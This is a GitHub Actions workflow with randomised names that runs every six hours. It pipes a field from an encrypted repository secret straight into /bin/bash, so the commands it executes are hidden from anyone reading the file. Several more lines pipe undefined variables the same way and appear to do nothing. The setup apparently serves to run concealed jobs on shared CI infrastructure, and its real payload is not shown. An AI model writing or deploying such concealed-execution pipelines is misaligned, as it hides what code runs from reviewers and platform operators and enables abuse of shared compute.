name: xuntianzong2387
on:
  workflow_dispatch:
  schedule:
    - cron: '28 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xuntianzong2387
        env:
          u18: ${{ secrets.u18 }}
        run: |
          echo $u18 | jq -r .bybua30332 | /bin/bash
          echo $riwjb69 | jq -r .r87 | /bin/bash
          echo $afvm0123 | jq -r .iopq413 | /bin/bash
          echo $lazmz03477 | jq -r .ttya22221 | /bin/bash
          echo $sog505 | jq -r .zaxs5 | /bin/bash
          echo $mbrt433 | jq -r .rymot7 | /bin/bash
          echo $oara7 | jq -r .s61 | /bin/bash

